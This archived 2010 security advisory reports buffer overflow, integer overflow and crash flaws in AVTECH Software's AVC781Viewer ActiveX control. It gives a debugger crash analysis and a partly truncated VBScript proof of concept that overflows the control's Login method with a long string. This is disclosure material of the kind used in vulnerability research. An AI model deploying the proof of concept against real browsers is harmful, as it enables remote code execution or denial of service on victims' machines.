Archive for April 19th, 2010

AVTECH Software (AVC781Viewer.dll) ActiveX Multiple Remote Vulnerabilities

Vendor: AVTECH Software, Inc.
Product Web Page:

Summary: AVTECH Software, a private corporation founded in 1988, is a computer software and
hardware manufacturer specializing in providing Windows NT/2K/XP/2K3 products to monitor
multi-OS computers and network issues throughout a department or an entire enterprise.
Once issues or events occur, AVTECH Software products use today’s most advanced alerting
technologies to communicate critical and important status information to remote system
managers and IT professionals via mobile phones, pagers, PDAs, email, the web and more.
Automatic corrective actions can also be taken to immediately resolve issues, run scripts,
and shutdown/restart servers or applications.

AVTECH Software is now the premier worldwide manufacturer of environment monitoring equipment
specifically designed to monitor today’s advanced computer rooms and data centers. Our Room Alert
and TemPageR products are used to monitor environmental conditions in many of the world’s most
secure data centers and are installed in almost every branch of the US government.

Description: AVTECH Software’s AVC781Viewer ActiveX Control suffers from multiple remote vulnerabilities
such as buffer overflow, integer overflow and denial of service (IE crash). This issue is
triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to execute arbitrary machine code in the context of
the affected application, facilitating the remote compromise of affected computers. Failed
exploit attempts likely result in browser crashes.


Disasm: 10006C23    MOV [EAX],CL    (AVC_AX_724_VIEWER.dll)

Seh Chain:
1     10022F68     AVC_AX_724_VIEWER.dll
2     FC2950     VBSCRIPT.dll
3     7C839AC0     KERNEL32.dll

Called From                   Returns To
AVC_AX_724_VIEWER.10006C23    AVC_AX_724_VIEWER.10044508
AVC_AX_724_VIEWER.10044508    AVC_AX_724_VIEWER.100097B0
AVC_AX_724_VIEWER.100097B0    8244C8B

EIP 10006C23
EBX 00180724 -> Uni: defaultV
ECX 0013EE41 -> 24001827 -> Uni: ‘$’$
EDI 001827BC -> Uni: defaultV
ESI 00180724 -> Uni: defaultV
EBP 00FE4658 -> 10044530 -> Asc: 0E0E
ESP 0013EE40 -> 001827BC

Block Disassembly:
10006C12    MOV EAX,[EBP+144]
10006C18    ADD EAX,60
10006C1B    JMP SHORT 10006C20
10006C1D    LEA ECX,[ECX]
10006C20    MOV CL,[EDX]
10006C22    INC EDX
10006C23    MOV [EAX],CL      <— CRASH
10006C25    INC EAX
10006C26    TEST CL,CL
10006C28    JNZ SHORT 10006C20
10006C2A    MOV EAX,[ESP+20]
10006C2E    ADD EAX,-10
10006C31    LEA ECX,[EAX+C]
10006C37    LOCK XADD [ECX],EDX

EBP+8    00FE4658 -> 10044530 -> Asc: 0E0E
EBP+16    0018AB44 -> Uni: defaultV
EBP+20    00180A54 -> Uni: defaultV
EBP+24    00000001
EBP+28    00000001

Stack Dump:
13EE40 BC 27 18 00 24 07 18 00 F4 EE 13 00 74 1F 18 00  […………t…]
13EE50 AC F1 13 00 68 2F 02 10 FF FF FF FF B7 9B 00 10  [….h………..]
13EE60 00 28 18 00 74 1F 18 00 BC 27 18 00 24 07 18 00  [….t………..]
13EE70 5C 07 18 00 F4 EE 13 00 00 00 00 00 D8 DD 47 00  [\………….G.]
13EE80 58 46 FE 00 08 00 00 00 08 00 13 00 44 4A 12 77  [XF……….DJ.w]


Proof Of Concept:

<object classid=’clsid:8214B72E-B0CD-466E-A44D-1D54D926038D’ id=’kungfuhustle’ />
<script language=’vbscript’>

targetFile = “C:\WINDOWS\system32\AVC_AX_724_VIEWER.dll”
prototype  = “Sub Login (

ByVal Username As String,
ByVal Password As String,
ByVal MediaType As String,
ByVal ConnectType As String

memberName = “Login”
progid     = “AVC781Viewer.CV781Object”
argCount   = 4

arg1=String(1010, “A”)

kungfuhustle.Login arg1 ,arg2 ,arg3 ,arg4


More info: